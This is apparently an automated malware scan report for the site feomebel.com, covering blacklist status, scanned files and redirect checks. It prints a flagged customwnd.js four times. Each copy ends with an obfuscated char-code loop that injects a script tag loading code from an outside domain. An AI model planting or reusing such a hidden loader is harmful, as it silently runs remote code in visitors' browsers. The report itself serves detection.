Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=feomebel.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://feomebel.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.feomebel.com/ | 200 OK Content-Length: 10587 Content-Type: text/html | clean |
http://www.feomebel.com/templates/jquery.js | 200 OK Content-Length: 91669 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/templates/customwnd/customwnd.js | 200 OK Content-Length: 8780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CustomWnd = function() { this.imgDir = 'templates/customwnd/images'; this.zIndex = 100000; this.dimmingColor = '#000000'; this.dimmingOpacity = 0; this.animationType = ''; var wnd_div = null; var dimming_div = null; this.openIframe = function(src, w, h) { dimming_div = jQuery('<div></div>'); dimming_div.css('position', 'absolute'); dimming_div.css('z-index', this.zIndex-1); dimming_div.css }); } else if(this.animationType=='show') { wnd_div.hide('slow', function(){ dimming_div.css('display', 'none'); wnd_div.remove(); dimming_div.remove(); }); } } } var cw = new CustomWnd(); <!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.feomebel.com/templates/javascripts.js | 200 OK Content-Length: 20454 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/./ | 200 OK Content-Length: 10587 Content-Type: text/html | clean |
http://www.feomebel.com/./templates/jquery.js | 200 OK Content-Length: 91669 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/./templates/customwnd/customwnd.js | 200 OK Content-Length: 8780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CustomWnd = function() { this.imgDir = 'templates/customwnd/images'; this.zIndex = 100000; this.dimmingColor = '#000000'; this.dimmingOpacity = 0; this.animationType = ''; var wnd_div = null; var dimming_div = null; this.openIframe = function(src, w, h) { dimming_div = jQuery('<div></div>'); dimming_div.css('position', 'absolute'); dimming_div.css('z-index', this.zIndex-1); dimming_div.css }); } else if(this.animationType=='show') { wnd_div.hide('slow', function(){ dimming_div.css('display', 'none'); wnd_div.remove(); dimming_div.remove(); }); } } } var cw = new CustomWnd(); <!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.feomebel.com/./templates/javascripts.js | 200 OK Content-Length: 20454 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/././ | 200 OK Content-Length: 10587 Content-Type: text/html | clean |
http://www.feomebel.com/././templates/jquery.js | 200 OK Content-Length: 91669 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/././templates/customwnd/customwnd.js | 200 OK Content-Length: 8780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CustomWnd = function() { this.imgDir = 'templates/customwnd/images'; this.zIndex = 100000; this.dimmingColor = '#000000'; this.dimmingOpacity = 0; this.animationType = ''; var wnd_div = null; var dimming_div = null; this.openIframe = function(src, w, h) { dimming_div = jQuery('<div></div>'); dimming_div.css('position', 'absolute'); dimming_div.css('z-index', this.zIndex-1); dimming_div.css }); } else if(this.animationType=='show') { wnd_div.hide('slow', function(){ dimming_div.css('display', 'none'); wnd_div.remove(); dimming_div.remove(); }); } } } var cw = new CustomWnd(); <!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.feomebel.com/././templates/javascripts.js | 200 OK Content-Length: 20454 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/./././ | 200 OK Content-Length: 10587 Content-Type: text/html | clean |
http://www.feomebel.com/./././templates/jquery.js | 200 OK Content-Length: 91669 Content-Type: application/x-javascript | clean |
http://www.feomebel.com/./././templates/customwnd/customwnd.js | 200 OK Content-Length: 8780 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CustomWnd = function() { this.imgDir = 'templates/customwnd/images'; this.zIndex = 100000; this.dimmingColor = '#000000'; this.dimmingOpacity = 0; this.animationType = ''; var wnd_div = null; var dimming_div = null; this.openIframe = function(src, w, h) { dimming_div = jQuery('<div></div>'); dimming_div.css('position', 'absolute'); dimming_div.css('z-index', this.zIndex-1); dimming_div.css }); } else if(this.animationType=='show') { wnd_div.hide('slow', function(){ dimming_div.css('display', 'none'); wnd_div.remove(); dimming_div.remove(); }); } } } var cw = new CustomWnd(); <!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools --> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: feomebel.com
Result:
GET / HTTP/1.1
Host: feomebel.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: feomebel.com
Referer: http://www.google.com/search?q=feomebel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: feomebel.com
Referer: http://www.google.com/search?q=feomebel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.